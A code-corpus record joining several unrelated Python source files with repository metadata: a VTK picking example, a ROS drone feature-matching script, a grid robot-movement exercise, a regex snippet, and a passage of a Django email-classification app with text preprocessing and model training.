interactor = vtk.vtkRenderWindowInteractor()
interactor.SetRenderWindow(renderWindow)
# Add spheres to play with
for i in range(numberOfSpheres):
source = vtk.vtkSphereSource()
# random position and radius
x = vtk.vtkMath.Random(-5, 5)
y = vtk.vtkMath.Random(-5, 5)
z = vtk.vtkMath.Random(-5, 5)
radius = vtk.vtkMath.Random(.5, 1.0)
source.SetRadius(radius)
source.SetCenter(x, y, z)
source.SetPhiResolution(11)
source.SetThetaResolution(21)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(source.GetOutputPort())
actor = vtk.vtkActor()
actor.SetMapper(mapper)
r = vtk.vtkMath.Random(.4, 1.0)
g = vtk.vtkMath.Random(.4, 1.0)
b = vtk.vtkMath.Random(.4, 1.0)
actor.GetProperty().SetDiffuseColor(r, g, b)
actor.GetProperty().SetDiffuse(.8)
actor.GetProperty().SetSpecular(.5)
actor.GetProperty().SetSpecularColor(colors.GetColor3d('White'))
actor.GetProperty().SetSpecularPower(30.0)
renderer.AddActor(actor)
# Render and interact
renderWindow.Render()
# Create the silhouette pipeline, the input data will be set in the
# interactor
silhouette = vtk.vtkPolyDataSilhouette()
silhouette.SetCamera(renderer.GetActiveCamera())
# Create mapper and actor for silhouette
silhouetteMapper = vtk.vtkPolyDataMapper()
silhouetteMapper.SetInputConnection(silhouette.GetOutputPort())
silhouetteActor = vtk.vtkActor()
silhouetteActor.SetMapper(silhouetteMapper)
silhouetteActor.GetProperty().SetColor(colors.GetColor3d("Tomato"))
silhouetteActor.GetProperty().SetLineWidth(5)
# Set the custom type to use for interaction.
style = MouseInteractorHighLightActor(silhouette, silhouetteActor)
style.SetDefaultRenderer(renderer)
# Start
interactor.Initialize()
interactor.SetInteractorStyle(style)
renderWindow.SetWindowName('HighlightWithSilhouette')
renderWindow.Render()
interactor.Start()
if __name__ == "__main__":
main()
| lorensen/VTKExamples | src/Python/Picking/HighlightWithSilhouette.py | HighlightWithSilhouette.py | py | 4,453 | python | en | code | 319 | github-code | 36 |
30922250366 | #!/usr/bin/env python
# from __future__ import division
import numpy as np
import message_filters
from matplotlib import pyplot as plt
import imutils
from time import time, sleep
# import os
from sensor_msgs.msg import Image
from geometry_msgs.msg import Point, Pose, Quaternion, Vector3
from cv_bridge import CvBridge, CvBridgeError
import rospy
import copy
# import stereoDepth as SD
# from sklearn import linear_model, datasets
from nav_msgs.msg import Odometry # We need this message type to read position and attitude from Bebop nav_msgs/Odometry
from geometry_msgs.msg import Twist
from geometry_msgs.msg import Point
from std_msgs.msg import Empty
# import PlaneRANSAC as PR
from itertools import compress
import tf
from optic_flow_example.msg import OpticFlowMsg
import cPickle
import sys
# from pykalman import UnscentedKalmanFilter
# from robust_kalman import RobustKalman
# from robust_kalman.utils import HuberScore, VariablesHistory, WindowStatisticsEstimator
from sklearn.cluster import KMeans
# from sklearn.linear_model import RANSACRegressor
ros_path = '/opt/ros/kinetic/lib/python2.7/dist-packages'
if ros_path in sys.path:
sys.path.remove(ros_path)
import cv2
sys.path.append('/opt/ros/kinetic/lib/python2.7/dist-packages')
keypoints = cPickle.loads(open("./keypoints.txt").read())
kp = []
for point in keypoints:
temp = cv2.KeyPoint(x=point[0][0],y=point[0][1],_size=point[1], _angle=point[2], _response=point[3], _octave=point[4], _class_id=point[5])
kp.append(temp)
des_img_des = np.loadtxt('descriptors.txt', dtype = float)
a = des_img_des
# a1 = np.loadtxt('descriptors1.txt', dtype = float)
rolavnum = 4
it = 0
# Rolling average
xarr = np.zeros(rolavnum)
yarr = np.zeros(rolavnum)
flow_x = 0
flow_y = 0
# Camera focal length [pixel]
f = 202
# Stereo base distance [mm]
B = 30
prev_time = 0
x_prev = 0
y_prev = 0
prev_image = None
last_time = 0
lk_params = dict( winSize = (15,15),
maxLevel = 2,
criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))
bridge = CvBridge()
points_to_track = []
center_pub = rospy.Publisher("/wall_center_point",Point)
contours_pub = rospy.Publisher('/mask', Image, queue_size=1)
def totuple(a):
try:
return tuple(totuple(i) for i in a)
except TypeError:
return a
def defpoints(image, spacing):
points_to_track = []
for x in range(0,image.shape[0],spacing):
for y in range(0,image.shape[1],spacing):
new_point = [y, x]
points_to_track.append(new_point)
points_to_track = np.array(points_to_track, dtype=np.float32) # note: float32 required for opencv optic flow calculations
points_to_track = points_to_track.reshape(points_to_track.shape[0], 1, points_to_track.shape[1]) # for some reason this needs to be shape (npoints, 1, 2)
return points_to_track
def writeOdom(data):
global global_pos
global global_vel
global_pos=data.pose.pose
global_vel=data.twist.twist
def rundetection():
rospy.init_node('feature_detection', anonymous=True)
right_sub = message_filters.Subscriber("/image_raw_throttled", Image, queue_size=10)#,heyo1)#,queue_size=4)
left_sub = message_filters.Subscriber("/image_raw_throttled", Image, queue_size=10)#,heyo2)#,queue_size=4)
rospy.Subscriber('/bebop/odom', Odometry, writeOdom)
ts = message_filters.TimeSynchronizer([left_sub,right_sub],10)
# ts.registerCallback(OpticalFlow)
ts.registerCallback(PoseEstimate)
rospy.spin()
def featuredetect(img):
numFeatures = 500
surf = cv2.xfeatures2d.SURF_create(numFeatures)
kp, des = surf.detectAndCompute(img,None)
# draw only keypoints location,not size and orientation
img2 = cv2.drawKeypoints(img,kp,None,color=(0,255,0), flags=0)
return kp, des
def featurecompare(des1, des2):
matcher = cv2.DescriptorMatcher_create(cv2.DescriptorMatcher_FLANNBASED)
matches = matcher.knnMatch(np.asarray(des1,np.float32),np.asarray(des2,np.float32), 2) #2
return matches
def plotter(image, points, points1, points2, cc, col, col1, col2):
color_img = image
if cc == 0:
color_img = cv2.cvtColor(image, cv2.COLOR_GRAY2BGR)
color = col # bgr colorspace
color1 = col1
color2 = col2
linewidth = 3
for x,y in points:
cv2.circle(color_img, (int(x),int(y)), 5 , color, thickness = linewidth) # draw a red line from the point with vector = [vx, vy]
for x,y in points1:
cv2.circle(color_img, (int(x),int(y)), 5 , color1, thickness = linewidth) # draw a red line from the point with vector = [vx, vy]
# for x,y in points2:
cv2.circle(color_img, (int(points2[0]),int(points2[1])), 5 , color2, thickness = linewidth) # draw a red line from the point with vector = [vx, vy]
return color_img
# plt.cla()
# # plt.plot(color_img)
# plt.imshow(color_img)
# # plt.show()
# plt.pause(0.05)
# cv2.imshow('tracked image',color_img)
# cv2.waitKey(1)
def plotavg(image, point, cc):
color_img = image
if cc == 0:
color_img = cv2.cvtColor(image, cv2.COLOR_GRAY2BGR)
color = [0,255,0] # bgr colorspace
linewidth = 3
# for x,y in points:
cv2.circle(color_img, (int(point[0]),int(point[1])), 5 , color, thickness = linewidth) # draw a red line from the point with vector = [vx, vy]
plt.cla()
# plt.plot(color_img)
plt.imshow(color_img)
# plt.show()
plt.pause(0.05)
def find_squares(img):
gray_new = img
# gray_new = cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)
# edges are preserved while doing median blur while removing noise
gra = cv2.medianBlur(gray_new,5)
#image normalization
gray = np.zeros(gra.shape)
gray = cv2.normalize(gra, gray, 0, 255, cv2.NORM_MINMAX)
# adaptive threshold
thresh = cv2.adaptiveThreshold(gray,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\
cv2.THRESH_BINARY,17,2)
# erode out the noise
thresh = cv2.erode(thresh,np.ones((3,3), np.uint8),iterations=1)
im, cnts, hierarchy = cv2.findContours(thresh, cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
drawing = np.zeros((thresh.shape[0], thresh.shape[1], 3), np.uint8)
# draw contours
for i in range(len(cnts)):
color_contours = (255, 255, 255)
# draw contours in a black image
cv2.drawContours(drawing, cnts, i, color_contours, 1, 8, hierarchy)
# do dilation after finding the
drawing1 = cv2.dilate(drawing, np.ones((3,3), np.uint8), iterations=9)
img_not = np.zeros((drawing1.shape[0], drawing1.shape[1], 3), np.uint8)
img_not = cv2.bitwise_not(drawing1)
mask = cv2.cvtColor(img_not, cv2.COLOR_BGR2GRAY)
im1, cnts1, hierarchy1 = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnt_area = []
cnt_num = []
for c in cnts1:
cnt_area.append(cv2.contourArea(c))
cnt_num = np.argsort(cnt_area)
cnt_area.sort()
large_cnts = np.zeros(np.shape(mask))
cnts_oi=[]
for i in range(5): # in the 5 largest contours, check if cnt_area > 5000
if cnt_area[len(cnt_area)-1-i] > 5000:
fresh_im = np.zeros(np.shape(mask))
cv2.drawContours(fresh_im, cnts1, cnt_num[len(cnt_num)-1-i], (255, 255, 255), -1)
im_temp = 255*np.ones(mask.shape) - fresh_im
cv2.drawContours(large_cnts, cnts1, cnt_num[len(cnt_num)-1-i], (255, 255, 255), -1)
cnts_oi.append(cnts1[cnt_num[len(cnt_num)-1-i]])
# dilate large conoturs
large_cnts = cv2.dilate(large_cnts, np.ones((5,5), np.uint8), iterations=1)
new_gray = cv2.bitwise_and(gray_new, gray_new, mask = np.uint8(large_cnts))
# cv2.imshow('mas',new_gray)
return new_gray, cnts_oi
class Queue:
#Constructor creates a list
def __init__(self):
self.queue = list()
#Adding elements to queue
def enqueue(self,data):
#Checking to avoid duplicate entry (not mandatory)
if data not in self.queue:
self.queue.insert(0,data)
return True
return False
#Removing the last element from the queue
def dequeue(self):
if len(self.queue)>0:
return self.queue.pop()
return ("Queue Empty!")
#Getting the size of the queue
def size(self):
return len(self.queue)
#printing the elements of the queue
def printQueue(self):
return self.queue
points_max_cx = Queue()
points_max_cy = Queue()
def PoseEstimate(leftImg,rightImg):
global it
left_image = bridge.imgmsg_to_cv2(leftImg, desired_encoding="mono8")
img = left_image
large_cnts = 0
img, cnts_oi = find_squares(img)
b1 = 0
kp1, des1 = featuredetect(left_image)
cur_img_des = des1
b = cur_img_des
matches = featurecompare(cur_img_des, des_img_des)
points = np.zeros((len(matches),2))
delta = np.zeros((len(matches),2))
dist = np.zeros((len(matches)))
matchMask = np.zeros((len(matches),2))
# ratio test as per Lowe's paper
# source: https://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_feature2d/py_matcher/py_matcher.html
if len(matches)!=0:
for i in range(0,len(matches)-1):
points[i] = kp1[matches[i][0].queryIdx].pt#features[m.queryIdx]]
if matches[i][0].distance < 0.8*matches[i][1].distance:
matchMask[i]=[1,0]
matchMaskbool = matchMask.astype('bool')
points = points[matchMaskbool[:,0]]
# Finding points inside contours
# y = 0
points_new = []#np.zeros((len(matches),2))
for x in range(len(points)):
for l in range(len(cnts_oi)):
# print(points[x].tolist())
point = (int(points[x][0]), int(points[x][1]))
dist = cv2.pointPolygonTest(cnts_oi[l],point,False)
if dist >= 0:
points_new.append(points[x])
# y = y+1
# Finding average points
# classifications, centers = kmeans(points_new)
clusters_num = 3
if len(points_new)<clusters_num:
clusters_num = len(points_new)
if clusters_num:
print(clusters_num)
estimator = KMeans(n_clusters=clusters_num)
estimator.fit(points_new)
# Ck's are the different clusters with corresponding point indices
c1 = np.where(estimator.labels_ == 0)[0]
c2 = np.where(estimator.labels_ == 1)[0]
c3 = np.where(estimator.labels_ == 2)[0]
max_len = len(c1)
max_c = 0
max_con = c1
if len(c2) > max_len:
max_len = len(c2)
max_c = 1
max_con = c2
if len(c3) > max_len:
max_len = len(c3)
max_c = 2
max_con = c3
points_max_c = []
# print(points_new[max_con[0]][:])
for i in range(max_len):
points_max_c.append(points_new[max_con[i]][:])
max_cx = estimator.cluster_centers_[max_c][0]
max_cy = estimator.cluster_centers_[max_c][1]
if it<rolavnum:
points_max_cx.enqueue(max_cx)
points_max_cy.enqueue(max_cy)
else:
points_max_cx.dequeue()
points_max_cy.dequeue()
points_max_cx.enqueue(max_cx)
points_max_cy.enqueue(max_cy)
it = it + 1
x = 0
y = 0
temo1 = points_max_cx.printQueue()
temo2 = points_max_cy.printQueue()
for i in range (points_max_cy.size()):
x = x + temo1[i]
y = y + temo2[i]
# rolling avg centroid
x = int(x/points_max_cy.size())
y = int(y/points_max_cy.size())
outt = Point()
outt.x=x
outt.y=y
center_pub.publish(outt)
# plotavg(img,(x,y),0)
centroid = [x,y]
# # plotter(img,np.array(points_new),0, (255, 0, 0))
pub_cv = plotter(img, points_new, points_max_c, centroid, 0, (255, 0, 0), (0, 0, 255), (0, 255, 0))
contours_pub.publish(bridge.cv2_to_imgmsg(pub_cv, "rgb8"))
if __name__ == '__main__':
try:
rundetection()
except rospy.ROSInterruptException:
pass
| tkurtiak/Project4b | matchfeat_old.py | matchfeat_old.py | py | 12,217 | python | en | code | 0 | github-code | 36 |
16556808242 | # Create a 2D matrix that acts as a workspace where a robot can move, ( eg: 1-> free space, 0-> obstacle). Create a function to insert obstacles at required/given coordinates. Write functions that can move the robot's(represent robot with other characters or numbers) position in the workspace. Write a function to visually represent the workspace, including the robot to the user on every move or change.
import numpy as np
def insert_obstacle(matrix, x, y, robot_x, robot_y):
if x == robot_x and y == robot_y:
print("Can't insert obstacle at the same position")
return matrix
matrix[x][y] = 1
return matrix
# Check if there are obstacle and move, left, right, top ,bottom
# if obstacle is there then print warning and dont move
def move_robot(matrix, x, y, direction):
ox = x
oy = y
if direction == "w":
x -= 1
elif direction == "s":
x += 1
elif direction == "a":
y -= 1
elif direction == "d":
y += 1
else:
print("invalid command\n")
return ox, oy
# check out of bound
if x < 0 or x > 9 or y < 0 or y > 9:
print("Out of bound\n")
return ox, oy
if matrix[x][y] == 1:
print("There is an obstacle at", x, y, "\n")
return ox, oy
return x, y
# print the matrix and obstacle and robot
def print_matrix(matrix, x, y):
for i in range(len(matrix)):
for j in range(len(matrix[i])):
if i == x and j == y:
print("*", end=" ")
else:
print(matrix[i][j], end=" ")
print()
if __name__ == "__main__":
# create 10 * 10 matix
matrix = np.zeros((10, 10), dtype=np.int8)
robot_x, robot_y = 0, 0
print_matrix(matrix, robot_x, robot_y)
# take user input
while True:
print("\n\n* is robot\n1. Add obstacle")
print("2. Move robot(a,s,d,f)")
print("3. Quit")
option = input("Enter your option: ")
if option == "1":
x = int(input("Enter x coordinate: "))
y = int(input("Enter y coordinate: "))
matrix = insert_obstacle(matrix, x, y, robot_x, robot_y)
print_matrix(matrix, robot_x, robot_y)
elif option == "2":
while True:
direction = input("Enter direction: ")
if direction == "q":
break
robot_x, robot_y = move_robot(matrix, robot_x, robot_y, direction)
print_matrix(matrix, robot_x, robot_y)
elif option == "3":
break
| ms-jagadeeshan/mars_task_2 | qn5.py | qn5.py | py | 2,574 | python | en | code | 0 | github-code | 36 |
6394243793 | import re
# Your sentence
sentence = "David and Lucy walk one mile to go to school every day at 8:00AM when there is no snow."
# The regular expression
time_regex = r"\b\d{1,2}:\d{2}(AM|PM)?\b"
# Search for the time in the sentence
time_match = re.search(time_regex, sentence)
if time_match:
# If the time was found, print it
print(f"Found time: {time_match.group()}")
else:
# If the time wasn't found, print a failure message
print("Time not found") | GranDiego117/KBAI | SentenceReadingAgent/test.py | test.py | py | 470 | python | en | code | 0 | github-code | 36 |
71504143463 | from django.shortcuts import render
from django.http import HttpResponse
from zipfile import ZipFile, is_zipfile, Path
import os
from outlook_msg import Message
import pandas as pd
import numpy as np
import re
import nltk
import spacy
from string import punctuation
import extract_msg
nltk.download('punkt')
from nltk.tokenize import word_tokenize
# NLTK stopwords modules
nltk.download('stopwords')
from nltk.corpus import stopwords
# NLTK lemmatization modules
nltk.download('wordnet')
from nltk.stem import WordNetLemmatizer
import io
import matplotlib.pyplot as plt
import sklearn
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
import pickle
import numpy as np
import pandas as pd
from keras import backend as K
from keras.layers.experimental.preprocessing import TextVectorization
from keras.preprocessing.text import one_hot,Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.layers import Reshape,RepeatVector,LSTM,Dense,Flatten,Bidirectional,Embedding,Input,Layer,GRU,Multiply,Activation,Lambda,Dot,TimeDistributed,Dropout,Embedding
from keras.models import Model
from keras.activations import softmax,selu,sigmoid
from keras.optimizers import Adam
from keras.initializers import glorot_uniform
from keras.regularizers import l2
from keras.constraints import min_max_norm
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import plot_model
import tensorflow as tf
import os
import gensim
from tqdm import tqdm
import keras
from .attention_with_context import *
from .sentence_encoder import *
from .word_encoder import *
########### GLOBALS ##################################
tfidf = None
category_filename = "category.pkl"
test_filelist_filename = "test_filenames.pkl"
tfidf_file = 'tfidf_file.pkl'
########## VIEWS ##################################
# Create your views here.
def index1(request):
# trained = True
# new_model = keras.models.load_model('model_and_weights.h5',custom_objects={'word_encoder': word_encoder})
#
# try:
# pass
# except:
# trained = False
# finally:
if request.method == 'GET':
return render(request, 'home.html', {'train_success': False})
if request.method == 'POST':
return render(request, 'home.html', {'train_success': False})
def submit_data(request):
if request.method == 'GET':
return HttpResponse("<h1>FORBIDDEN!</h1> <h2>This Page Cannot Be Accessed Directly.</h2>")
elif request.method == 'POST':
print("For debug")
print(request.FILES)
file = request.FILES['train']
if is_zipfile(file) is False:
return HttpResponse("<h1>FORBIDDEN!<h1><h2>You Need To Upload A Zip File Containing The DataSet</h2>")
# Stores the categories obtained
cats = []
# Extract the files to a new directory named by the input folder name
file_path = ""
with ZipFile(file,'r') as myzip:
path = Path(myzip)
# print(path.name)
for dir in path.iterdir():
cats.append(dir.name)
file_path = os.getcwd() + os.path.sep + myzip.filename.split('.')[0]
print(file_path)
myzip.extractall(path=file_path)
# save the category file to disk, so that can be retrieved while testing
open_file = open(category_filename,'wb')
pickle.dump(cats,open_file)
open_file.close()
# Now the Zip file has been extracted to the working directory and file_path is the absolute path of the folder
data = []
for cat in cats:
sub_path = file_path + os.path.sep + cat
for root,directories,files in os.walk(sub_path):
for file in files:
abs_path = os.path.join(root,file)
# with extract_msg.Message(abs_path) as msg:
with open(abs_path) as msg_file:
msg = Message(msg_file)
sub = "\""+msg.subject+"\""
body = "\""+msg.body+"\""
temp = [cat, sub, body]
data.append(temp)
df = pd.DataFrame(data,columns=['Category', 'Subject', 'Body'])
csv_path = file_path+'.csv'
df.to_csv(csv_path, index=False, header=True)
preprocess(csv_path=csv_path)
with open(csv_path, 'rb') as fh:
response = HttpResponse(fh.read(), content_type="text/csv")
response['Content-Disposition'] = 'inline; filename=' + os.path.basename(csv_path)
return response
return HttpResponse("DONE")
def index2(request):
trained = True
try:
f = open('Train_AI_Model','rb')
except:
trained = False
finally:
if request.method == 'GET':
return render(request,'home2.html', {'train_success': trained})
if request.method == 'POST':
return render(request,'home2.html', {'train_success': trained})
##### FUNCTION TO PREPROCESS DATA #############################
def remove_emails_urls(dataframe):
no_emails = re.sub(r'\S*@\S*\s?','',str(dataframe))
no_url = re.sub(r"http\S+",'',no_emails)
return no_url
def remove_dates(dataframe):
# DD/MM/YYYY or MM/DD/YYYY or DD|MM.MM|DD.YYYY format
dataframe = re.sub(r'(\b(0?[1-9]|[12]\d|30|31)[^\w\d\r\n:](0?[1-9]|1[0-2])[^\w\d\r\n:](\d{4}|\d{2})\b)|(\b(0?[1-9]|1[0-2])[^\w\d\r\n:](0?[1-9]|[12]\d|30|31)[^\w\d\r\n:](\d{4}|\d{2})\b)','',dataframe)
# October 21, 2014 format
dataframe = re.sub(r'\b(?:jan(?:uary)?|feb(?:ruary)?|mar(?:ch)?|apr(?:il)?|may|jun(?:e)?|jul(?:y)?|aug(?:ust)?|sep(?:tember)?|oct(?:ober)?|(nov|dec)(?:ember)?)(?=\D|$)','',dataframe)
# mon|monday format
dataframe = re.sub(r'\b((mon|tues|wed(nes)?|thur(s)?|fri|sat(ur)?|sun)(day)?)\b','',dataframe)
return dataframe
def remove_useless(dataframe):
#for body removal words
dataframe = re.sub('from:','',dataframe)
dataframe = re.sub('sent:','',dataframe)
dataframe = re.sub('to:','',dataframe)
dataframe = re.sub('cc:','',dataframe)
dataframe = re.sub('bcc:','',dataframe)
dataframe = re.sub('subject:','',dataframe)
dataframe = re.sub('message encrypted','',dataframe)
dataframe = re.sub('warning:','',dataframe)
#for subject removal words
dataframe = re.sub('fw:','',dataframe)
dataframe = re.sub('re:','',dataframe)
return dataframe
def remove_punctuation(text):
#function to remove the punctuation
return re.sub('[^\w\s]','',text)
def remove_no(text):
return re.sub(r"\d+",'',text)
def remove_of_words(text):
text = re.sub(r"\b_([a-zA-z]+)_\b",r"\1",text) #replace _word_ to word
text = re.sub(r"\b_([a-zA-z]+)\b",r"\1",text) #replace _word to word
text = re.sub(r"\b([a-zA-z]+)_\b",r"\1",text) #replace word_ to word
text = re.sub(r"\b([a-zA-Z]+)_([a-zA-Z]+)\b",r"\1 \2", text) #replace word1_word2 to word1 word2
return text
def remove_less_two(text):
return re.sub(r'\b\w{1,3}\b',"",text) #remove words <3
def remove_char(dataframe):
result = re.sub(r"\s+",' ',dataframe)
result = re.sub(r"^\s+|\s+$","",result)
result = re.sub(r"\b____________________________\b",'',result)
return result
def remove_stopwords(text):
all_stop_words = stopwords.words('english')
greet_sw = ['hello', 'good', 'morning', 'evening', 'afternoon', 'respected', 'dear', 'madam', 'sincerely',
'regards', 'truly']
all_stop_words.extend(greet_sw)
"""custom function to remove the stopwords"""
tokens = word_tokenize(text)
token_wsw = [w for w in tokens if w not in all_stop_words]
filter_str = ' '.join(token_wsw)
return filter_str
def lemmatized(text):
lemmatizer = nltk.stem.WordNetLemmatizer()
tokens = word_tokenize(text)
lemma = [lemmatizer.lemmatize(word) for word in tokens]
filter_str = ' '.join(lemma)
return filter_str
def preprocess(csv_path,test=False):
"""**Upload the Data**"""
df = pd.read_csv(csv_path)
"""**Lower Text Case**"""
df[['Subject', 'Body']] = df[['Subject', 'Body']].apply(lambda x: x.str.lower())
"""**Removing Emails and URLs -** Patterns: ```regexp(r'[\w\.*]+@[\w\.*]+\b'); regexp(r'\S*@\S*\s?')```"""
df['Subject'] = df['Subject'].apply(remove_emails_urls)
df['Body'] = df['Body'].apply(remove_emails_urls)
"""**Removing Dates**"""
df['Subject'] = df['Subject'].apply(remove_dates)
df['Body'] = df['Body'].apply(remove_dates)
"""**Removing Useless Words -** ```['from:','sent:','to:','message encrypted','warning:','subject:','fw:','re:','cc:','bcc:']```"""
df['Body'] = df['Body'].apply(remove_useless)
df['Subject'] = df['Subject'].apply(remove_useless)
"""**Removing of Punctuations -** `!"#$%&\'()*+,-./:;<=>?@[\\]^_{|}~` """
df['Subject'] = df['Subject'].apply(remove_punctuation)
df['Body'] = df['Body'].apply(remove_punctuation)
"""**Removing Numbers**"""
df['Subject'] = df['Subject'].apply(remove_no)
df['Body'] = df['Body'].apply(remove_no)
"""**Replacing “_word_” , “_word” , “word_” kinds to word**"""
df['Subject'] = df['Subject'].apply(remove_of_words)
df['Body'] = df['Body'].apply(remove_of_words)
"""**Removing the Short Characters (<3 words)**"""
df['Subject'] = df['Subject'].apply(remove_less_two)
df['Body'] = df['Body'].apply(remove_less_two)
"""**Removing Special Characters (\n,\r...)**"""
df['Subject'] = df['Subject'].apply(remove_char)
df['Body'] = df['Body'].apply(remove_char)
"""### **NLP Based Preprocessing**
**Removing Stopwords**
"""
df['Subject'] = df['Subject'].apply(remove_stopwords)
df['Body'] = df['Body'].apply(remove_stopwords)
"""**Lemmatization** """
df['Lemma Subject'] = df['Subject'].apply(lemmatized)
df['Lemma Body'] = df['Body'].apply(lemmatized)
"""**Saving of Preprocessed Data**"""
if test:
df.to_csv('Pre_Test.csv', index=False)
else:
df.to_csv('Pre_Train.csv', index=False)
############ MACHINE LEARNING TRAINING FUNCTION #######################################
def trainml(request):
try:
data = pd.read_csv("Pre_Train.csv", encoding='utf-8')
except:
return HttpResponse("<h1>FORBIDDEN!<h1><h2>You Need To Upload the Train Dataset first</h2>")
else:
# data['Category_Id'] = data['Category'].factorize()[0]
#
# data['Lemma Message'] = data['Lemma Subject'].astype(str) + " " + data['Lemma Body'].astype(str)
df = data[['Category_id', 'LemmaConcatenated']]
category_id_df = data[['Category', 'Category_id']].drop_duplicates().sort_values('Category_id')
"""**Text Vectorization**"""
global tfidf
tfidf = TfidfVectorizer(sublinear_tf=True, min_df=5, norm='l2', encoding='latin-1', ngram_range=(1, 2),
stop_words='english')
features = tfidf.fit_transform(df['LemmaConcatenated']).toarray()
# save the tfidf model
open_file = open(tfidf_file,'wb')
pickle.dump(tfidf,open_file)
open_file.close()
# continue with everything
labels = df.Category_id
"""**Train the Model**"""
model = RandomForestClassifier(random_state=0, n_estimators=200, min_samples_split=2, min_samples_leaf=1,
max_features='auto', max_depth=105, bootstrap='False')
# Split the Data
X_train = features
y_train = labels
# Train the Algorithm
train_model = model.fit(X_train, y_train)
"""**Save the Model**"""
pickle.dump(train_model, open('Train_AI_Model', 'wb'))
return render(request, 'home2.html', {'train_success' : True})
#################################################################### DEEP LEARNING TRAIN FUNCTION #######################################
def dot_product(x, kernel):
"""
Wrapper for dot product operation, in order to be compatible with both
Theano and Tensorflow
Args:
x (): input
kernel (): weights
Returns:
"""
if K.backend() == 'tensorflow':
return K.squeeze(K.dot(x, K.expand_dims(kernel)), axis=-1)
else:
return K.dot(x, kernel)
def emb_loss(model, X, Y, training):
# training=training is needed only if there are layers with different
# behavior during training versus inference (e.g. Dropout).
Y_tilde = model(X, training=training)
a = tf.keras.losses.CategoricalCrossentropy()
E_loss_T0 = a(Y, Y_tilde)
return E_loss_T0
def grad_emb(model, inputs, targets):
with tf.GradientTape() as tape:
loss_value = emb_loss(model, inputs,targets, training=True)
return loss_value, tape.gradient(loss_value, model.trainable_variables)
def traindl(request):
try:
df = pd.read_csv('Pre_Train.csv')
except:
return HttpResponse("<h1>FORBIDDEN!<h1><h2>You Need To First Upload The Train DataSet</h2>")
else:
df = df.sample(frac=1)
"""**Applying the Categories to Numbers**"""
df2 = pd.get_dummies(df['Category'])
# Voabulary and number of words
vocab = 10000
sequence_length = 40
df1 = df[['Lemma Body']]
"""**Converting to Numpy Array**"""
# Prepare Tokenizer
t = Tokenizer()
words = list(df1['Lemma Body'])
t.fit_on_texts(words)
vocab_size = len(t.word_index) + 1
# integer encode the documents
encoded_docs = t.texts_to_sequences(words)
# pad documents to a max length of 40 words
padded_docs = pad_sequences(encoded_docs, maxlen=sequence_length, padding='post')
# Preparing the labels into arrays
labels = df2.to_numpy()
"""**Reshape to (Documents X Sentences X Words)**"""
a = tf.reshape(padded_docs, (297, 4, 10))
x_train = a[:]
y_train = labels[:]
index_dloc = 'word_embeddings/glove_6B_300d.txt'
"""Here we create a dictionary named embedding vector, which will have keys, defined as words, present in the glove embedding file and the value of that key will be the embedding present in the file. This dictionary will contain all the words available in the glove embedding file."""
embedding_index = dict()
f = open(index_dloc)
for line in tqdm(f):
value = line.split(' ')
word = value[0]
coef = np.array(value[1:], dtype='float32')
embedding_index[word] = coef
f.close()
# create a weight matrix for words in training docs
embedding_matrix = np.zeros((vocab_size, 300))
for word, i in t.word_index.items():
embedding_vector = embedding_index.get(word)
if embedding_vector is not None:
embedding_matrix[i] = embedding_vector
words = 10
sentences = 4
document = 16
units = 64
# Shape of Input = (No of document, No of Sentences, No of Words)
input = Input(batch_input_shape=(document, sentences, words))
# Word Encoder
# Reshape into (No of Documents * No of Sentences, No of Words)
# Embedding layer Output Shape = (No of Documents * No of Sentences, No of Words, Embedding Dimension)
a1 = word_encoder(lstm_units=128, dense_units=64, emb=300, document=document, sentences=sentences, words=words,
embeddings=embedding_matrix)(input)
a2 = AttentionWithContext()(a1)
# Sentence Encoder
a3 = sentence_encoder(lstm_units=128, dense_units=64, document=document, sentences=sentences, units=units)(a2)
a4 = AttentionWithContext()(a3)
a5 = Dropout(0.2)(a4)
# Document Classification
output = Dense(3, activation='softmax')(a5)
model = Model(input, output)
# print('Start Network Training')
# Instantiate an optimizer
adam = Adam(learning_rate=0.000099, beta_1=0.9, beta_2=0.999, amsgrad=False)
# keep results for plotting
train_loss_results = []
for epoch in range(15):
epoch_loss_avg = tf.keras.metrics.CategoricalAccuracy()
# Training Loop, using the batches of 16
for i in range(0, 13):
x = x_train[i * 16:(i + 1) * 16]
y = y_train[i * 16:(i + 1) * 16]
# Optimize the model
loss_value, grads = grad_emb(model, x, y)
adam.apply_gradients(zip(grads, model.trainable_variables))
# Track progress
epoch_loss_avg.update_state(y, model(x)) # Add current batch loss
# Compare predicted label to actual label
# End epoch
train_loss_results.append(epoch_loss_avg.result())
# print("Epoch {:03d}: Loss: {:.3f}".format(epoch, epoch_loss_avg.result()))
# print('Finish Network Training')
model.save('model_and_weights')
return render(request, 'home.html',{'train_succes':True})
############################################################# SUBMIT TEST DATASET FUNCTION ###################################
def submit_test(request):
if request.method == 'GET':
return HttpResponse("<h1>FORBIDDEN!</h1> <h2>This Page Cannot Be Accessed Directly.</h2>")
elif request.method == 'POST':
# print("For debug")
# print(request.FILES)
file = request.FILES['test']
if is_zipfile(file) is False:
return HttpResponse("<h1>FORBIDDEN!<h1><h2>You Need To Upload A Zip File Containing The DataSet</h2>")
# Stores the categories obtained
cats = []
# Extract the files to a new directory named by the input folder name
file_path = ""
with ZipFile(file,'r') as myzip:
path = Path(myzip)
# print(path.name)
for dir in path.iterdir():
cats.append(dir.name)
file_path = os.getcwd() + os.path.sep + myzip.filename.split('.')[0]
print(file_path)
myzip.extractall(path=file_path)
# Now the Zip file has been extracted to the working directory and file_path is the absolute path of the folder
data = []
file_list = []
for cat in cats:
sub_path = file_path + os.path.sep + cat
for root,directories,files in os.walk(sub_path):
for file in files:
abs_path = os.path.join(root,file)
# with extract_msg.Message(abs_path) as msg:
with open(abs_path) as msg_file:
msg = Message(msg_file)
sub = "\""+msg.subject+"\""
body = "\""+msg.body+"\""
temp = [sub, body]
data.append(temp)
file_list.append(file)
# save the names of files for later use in classifying
